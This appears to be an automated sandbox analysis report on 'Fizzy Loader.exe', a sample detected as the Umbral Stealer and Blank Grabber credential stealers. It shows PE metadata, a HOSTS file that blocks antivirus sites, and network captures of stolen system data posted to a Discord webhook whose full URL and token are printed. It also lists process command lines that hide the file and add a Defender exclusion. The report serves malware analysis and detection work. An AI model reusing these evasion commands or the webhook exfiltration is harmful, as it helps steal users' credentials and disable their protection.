                                                                                                                                                          SSDEEP:48:vDZhyoZWM9rU5fFc7s9PI8A+VyUq8UwWsnNhUm:vDZEurK988TwU0wWsn/
                                                                                                                                                          MD5:C9901CB0AE22A9ABBD192B692AE4E2EB
                                                                                                                                                          SHA1:12976AC7024E5D1FF3FDF5E6A8251DC9C9205E39
                                                                                                                                                          SHA-256:3865EE9FBAF4813772CADE7B42A2E8AA8248734DD92FA5498D49947295E16EE0
                                                                                                                                                          SHA-512:E3E796F34E894C1B924B087CEC0CCA928BFD6FED71C462F30E79264EC3BF5353C434C69094FFB9EE0C3AD6DE694AA0B13B5490013AB1C28452C1CDC19C4F0E6F
                                                                                                                                                          Malicious:true
                                                                                                                                                          Preview:# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost...0.0.0.0 virustotal.com..0.0.0.0 www.virustotal.com..0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.
                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                          Entropy (8bit):6.0522746277225234
                                                                                                                                                          TrID:
                                                                                                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                                                                                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                                                          File name:Fizzy Loader.exe
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5:b56af795f8b7edc6f35a9e905921ed0e
                                                                                                                                                          SHA1:c82cb0088bc9c93fd9a491ad278f410d44265a4d
                                                                                                                                                          SHA256:46a67cdc899f61ccb6324d187d56b389f720d72beb02594fd60fdc4a8ca62ab4
                                                                                                                                                          SHA512:c35b429e243845337903fa5cc6853c6921514b2fcd84e7788607aa47414be9b2101c8b87acd1766666daa7fc0cdd2b7a5be19ac5754db8f12c3e262ea792f9c6
                                                                                                                                                          SSDEEP:6144:dloZM+rIkd8g+EtXHkv/iD4M7+QWRJ6RvSgR1E9/gF8e1mfIi:/oZtL+EP8M7+QWRJ6RvSgR1Ecqx
                                                                                                                                                          TLSH:A4346B5837B89F16E25F8BBEE5B1148F8771F103E90AF7CE0C8895EC2411B42E949A57
                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l.a..........."...0.............~.... ........@.. ....................................`................................
                                                                                                                                                          Icon Hash:00928e8e8686b000
                                                                                                                                                          Entrypoint:0x43aa7e
                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                          Digitally signed:false
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                          DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                          Time Stamp:0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
                                                                                                                                                          TLS Callbacks:
                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                          OS Version Major:4
                                                                                                                                                          OS Version Minor:0
                                                                                                                                                          File Version Major:4
                                                                                                                                                          File Version Minor:0
                                                                                                                                                          Subsystem Version Major:4
                                                                                                                                                          Subsystem Version Minor:0
                                                                                                                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                                                                                                          Instruction
                                                                                                                                                          jmp dword ptr [00402000h]
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
                                                                                                                                                          add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3aa28 | 0x53 | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x3c000 | 0x550 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3e000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3aa0c | 0x1c | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0x38a84 | 0x38c00 | b9069dec35a882deca70ac70a52578d8 | False | 0.39876015280837 | data | 6.0681412862433985 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0x3c000 | 0x550 | 0x600 | 962661cf515c57234d66775c661dfade | False | 0.4134114583333333 | data | 4.575008625258809 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x3e000 | 0xc | 0x200 | 3ce13a370488f4dff6dc4763fbc4f166 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_VERSION | 0x3c0a0 | 0x2c4 | data | | | 0.4449152542372881
RT_MANIFEST | 0x3c364 | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators | | | 0.5489795918367347

DLL | Import
mscoree.dll | _CorExeMain

Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-31T00:50:28.592541+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49807 | 208.95.112.1 | 80 | TCP
2024-12-31T00:50:52.056252+0100 | 2045593 | ET MALWARE Win32/Umbral-Stealer CnC Exfil via Discord (POST) | 1 | 192.168.2.5 | 49939 | 162.159.138.232 | 443 | TCP
                                                                                                                                                          Dec 31, 2024 00:50:52.731749058 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.731789112 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.731794119 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.731839895 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.731846094 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.731899023 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.731904984 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.731947899 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.731952906 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.732002974 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.732008934 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.732060909 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.732079029 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.732709885 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.732716084 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.732780933 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.732786894 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.733114958 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.733119965 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.733184099 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.733190060 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.733263016 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.733268976 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.733330965 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.733508110 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.733633995 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.733736992 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.733839989 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.739749908 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.741100073 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.741106987 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.741189003 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.741235018 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.741283894 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.741328001 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.741364956 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.748291016 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.749056101 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.749063969 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.749094963 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.749128103 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.749327898 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:52.749363899 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:52.754353046 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:53.418612957 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:53.418694019 CET44349945162.159.138.232192.168.2.5
                                                                                                                                                          Dec 31, 2024 00:50:53.418741941 CET49945443192.168.2.5162.159.138.232
                                                                                                                                                          Dec 31, 2024 00:50:53.419186115 CET49945443192.168.2.5162.159.138.232
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 31, 2024 00:49:54.502784967 CET | 55663 | 53 | 192.168.2.5 | 1.1.1.1
Dec 31, 2024 00:49:54.509510994 CET | 53 | 55663 | 1.1.1.1 | 192.168.2.5
Dec 31, 2024 00:50:28.066936016 CET | 51364 | 53 | 192.168.2.5 | 1.1.1.1
Dec 31, 2024 00:50:28.074982882 CET | 53 | 51364 | 1.1.1.1 | 192.168.2.5
Dec 31, 2024 00:50:50.418452024 CET | 58603 | 53 | 192.168.2.5 | 1.1.1.1
Dec 31, 2024 00:50:51.214456081 CET | 53 | 58603 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 31, 2024 00:49:54.502784967 CET | 192.168.2.5 | 1.1.1.1 | 0xc15 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Dec 31, 2024 00:50:28.066936016 CET | 192.168.2.5 | 1.1.1.1 | 0x6c51 | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Dec 31, 2024 00:50:50.418452024 CET | 192.168.2.5 | 1.1.1.1 | 0x3d46 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 31, 2024 00:49:54.509510994 CET | 1.1.1.1 | 192.168.2.5 | 0xc15 | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 00:50:28.074982882 CET | 1.1.1.1 | 192.168.2.5 | 0x6c51 | No error (0) | ip-api.com |  | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 00:50:51.214456081 CET | 1.1.1.1 | 192.168.2.5 | 0x3d46 | No error (0) | discord.com |  | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 00:50:51.214456081 CET | 1.1.1.1 | 192.168.2.5 | 0x3d46 | No error (0) | discord.com |  | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 00:50:51.214456081 CET | 1.1.1.1 | 192.168.2.5 | 0x3d46 | No error (0) | discord.com |  | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 00:50:51.214456081 CET | 1.1.1.1 | 192.168.2.5 | 0x3d46 | No error (0) | discord.com |  | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Dec 31, 2024 00:50:51.214456081 CET | 1.1.1.1 | 192.168.2.5 | 0x3d46 | No error (0) | discord.com |  | 162.159.135.232 | A (IP address) | IN (0x0001) | false
• discord.com
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49705 | 208.95.112.1 | 80 | 1708 | C:\Users\user\Desktop\Fizzy Loader.exe

Timestamp | Bytes transferred | Direction | Data
Dec 31, 2024 00:49:54.515573978 CET | 80 | OUT | GET /line/?fields=hosting HTTP/1.1
Host: ip-api.com
Connection: Keep-Alive
Dec 31, 2024 00:49:55.065258026 CET | 175 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Dec 2024 23:49:54 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 6
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Raw: 66 61 6c 73 65 0a
Data Ascii: false


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49807 | 208.95.112.1 | 80 | 1708 | C:\Users\user\Desktop\Fizzy Loader.exe

Timestamp | Bytes transferred | Direction | Data
Dec 31, 2024 00:50:28.080804110 CET | 55 | OUT | GET /json/?fields=225545 HTTP/1.1
Host: ip-api.com
Dec 31, 2024 00:50:28.581872940 CET | 381 | IN | HTTP/1.1 200 OK
Date: Mon, 30 Dec 2024 23:50:28 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 204
Access-Control-Allow-Origin: *
X-Ttl: 60
X-Rl: 44
Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49939 | 162.159.138.232 | 443 | 1708 | C:\Users\user\Desktop\Fizzy Loader.exe

Timestamp | Bytes transferred | Direction | Data
2024-12-30 23:50:51 UTC | 360 | OUT | POST /api/webhooks/1323224754576166912/ngAQr5IRg8PVqlg_GePwPe46g-WcVmFR7-gQu1RH44lVF1JX9hv6jSy8rNgxBAU6LxYx HTTP/1.1
Accept: application/json
User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 940
Expect: 100-continue
Connection: Keep-Alive
2024-12-30 23:50:51 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-12-30 23:50:51 UTC | 940 | OUT | Data Ascii: {"content":"@everyone","embeds":[{"title":"Umbral Stealer","description":"**__System Info__**\r\n```autohotkey\r\nComputer Name: 855271\r\nComputer OS: Microsoft Windows 10 Pro\r\nTotal Memory: 4 GB\r\nUUID: 2ED92742-89DC-DD72-92E8-869FA5A66493\r\nCPU: In
2024-12-30 23:50:52 UTC | 1300 | IN | HTTP/1.1 404 Not Found
Date: Mon, 30 Dec 2024 23:50:51 GMT
Content-Type: application/json
Content-Length: 45
Connection: close
Cache-Control: public, max-age=3600, s-maxage=3600
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1735602653
x-ratelimit-reset-after: 1
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sp9Xcu7jb8Q9TDFkNuyBO0qkdajgnAtBb3bX4ito3vUfs%2FksigpR1ayZMAFn8g9EekmaUitIT%2BBNEubbCHXb7TkaClq5s7zogJ%2BkBhMrsAPJMeIbueqSqYNVIa8N"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Set-Cookie: __cfruid=00cd115a1a74109f9fe413390f3319ad8bb28a98-1735602651; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: _cfuvid=s_12375XKPSx0UJ_BaiP2SV1hCsiVbbEJ1oivB0yLQs-1735602651904-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8fa5ef3d8bec5e74-EWR
{"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                          1 | 192.168.2.5 | 49945 | 162.159.138.232 | 443 | 1708 | C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                          2024-12-30 23:50:52 UTC | 531 | OUT | POST /api/webhooks/1323224754576166912/ngAQr5IRg8PVqlg_GePwPe46g-WcVmFR7-gQu1RH44lVF1JX9hv6jSy8rNgxBAU6LxYx HTTP/1.1
                                                                                                                                                          Accept: application/json
                                                                                                                                                          User-Agent: Opera/9.80 (Windows NT 6.1; YB/4.0.0) Presto/2.12.388 Version/12.17
                                                                                                                                                          Content-Type: multipart/form-data; boundary="39cddf4a-0995-4cf8-bfa9-e03f655560dc"
                                                                                                                                                          Host: discord.com
                                                                                                                                                          Cookie: __cfruid=00cd115a1a74109f9fe413390f3319ad8bb28a98-1735602651; _cfuvid=s_12375XKPSx0UJ_BaiP2SV1hCsiVbbEJ1oivB0yLQs-1735602651904-0.0.1.1-604800000
                                                                                                                                                          Content-Length: 689332
                                                                                                                                                          Expect: 100-continue
                                                                                                                                                          2024-12-30 23:50:52 UTC | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                                          2024-12-30 23:50:52 UTC | 40 | OUT | Data Raw: 2d 2d 33 39 63 64 64 66 34 61 2d 30 39 39 35 2d 34 63 66 38 2d 62 66 61 39 2d 65 30 33 66 36 35 35 35 36 30 64 63 0d 0a
                                                                                                                                                          Data Ascii: --39cddf4a-0995-4cf8-bfa9-e03f655560dc
                                                                                                                                                          2024-12-30 23:50:52 UTC | 140 | OUT | Data Raw: 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 7a 69 70 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 66 69 6c 65 3b 20 66 69 6c 65 6e 61 6d 65 3d 55 6d 62 72 61 6c 2d 38 35 35 32 37 31 2e 7a 69 70 3b 20 66 69 6c 65 6e 61 6d 65 2a 3d 75 74 66 2d 38 27 27 55 6d 62 72 61 6c 2d 38 35 35 32 37 31 2e 7a 69 70 0d 0a 0d 0a
                                                                                                                                                          Data Ascii: Content-Type: application/zip
                                                                                                                                                          Content-Disposition: form-data; name=file; filename=Umbral-855271.zip; filename*=utf-8''Umbral-855271.zip
                                                                                                                                                          2024-12-30 23:50:53 UTC | 1009 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                          Date: Mon, 30 Dec 2024 23:50:53 GMT
                                                                                                                                                          Content-Type: application/json
                                                                                                                                                          Content-Length: 45
                                                                                                                                                          Connection: close
                                                                                                                                                          Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                                                                                          strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                          x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                                                                                          x-ratelimit-limit: 5
                                                                                                                                                          x-ratelimit-remaining: 4
                                                                                                                                                          x-ratelimit-reset: 1735602654
                                                                                                                                                          x-ratelimit-reset-after: 1
                                                                                                                                                          via: 1.1 google
                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                          CF-Cache-Status: DYNAMIC
                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=M3sFzqoe8yR%2FjHoxNFvxHpwyMrJIJ3N3abOydo%2FwysoygHPEGkIUD1tZAEr%2FMwcB9n0ozg4B6R7vHwken%2Ftia5kGsgqjLNPZ4iQ7Hx2bKqehRdraR9S34%2Fs30d8I"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                          Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                                                                                          Server: cloudflare
                                                                                                                                                          CF-RAY: 8fa5ef433d397c84-EWR
                                                                                                                                                          {"message": "Unknown Webhook", "code": 10015}


                                                                                                                                                          Target ID:0
                                                                                                                                                          Start time:18:49:50
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Users\user\Desktop\Fizzy Loader.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"C:\Users\user\Desktop\Fizzy Loader.exe"
                                                                                                                                                          Imagebase:0x172aed80000
                                                                                                                                                          File size:235'008 bytes
                                                                                                                                                          MD5 hash:B56AF795F8B7EDC6F35A9E905921ED0E
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_UmbralStealer, Description: Yara detected Umbral Stealer, Source: 00000000.00000000.1996507067.00000172AED82000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.2624137126.00000172B0CE9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.2624137126.00000172B0BBD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                          Reputation:low
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:2
                                                                                                                                                          Start time:18:49:52
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"wmic.exe" csproduct get uuid
                                                                                                                                                          Imagebase:0x7ff61d3e0000
                                                                                                                                                          File size:576'000 bytes
                                                                                                                                                          MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:3
                                                                                                                                                          Start time:18:49:52
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:4
                                                                                                                                                          Start time:18:49:54
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\attrib.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"attrib.exe" +h +s "C:\Users\user\Desktop\Fizzy Loader.exe"
                                                                                                                                                          Imagebase:0x7ff613180000
                                                                                                                                                          File size:23'040 bytes
                                                                                                                                                          MD5 hash:5037D8E6670EF1D89FB6AD435F12A9FD
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:moderate
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:5
                                                                                                                                                          Start time:18:49:54
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                          Imagebase:0x7ff6d64d0000
                                                                                                                                                          File size:862'208 bytes
                                                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high
                                                                                                                                                          Has exited:true

                                                                                                                                                          Target ID:6
                                                                                                                                                          Start time:18:49:54
                                                                                                                                                          Start date:30/12/2024
                                                                                                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:"powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Fizzy Loader.exe'
                                                                                                                                                          Imagebase:0x7ff7be880000
                                                                                                                                                          File size:452'608 bytes
                                                                                                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
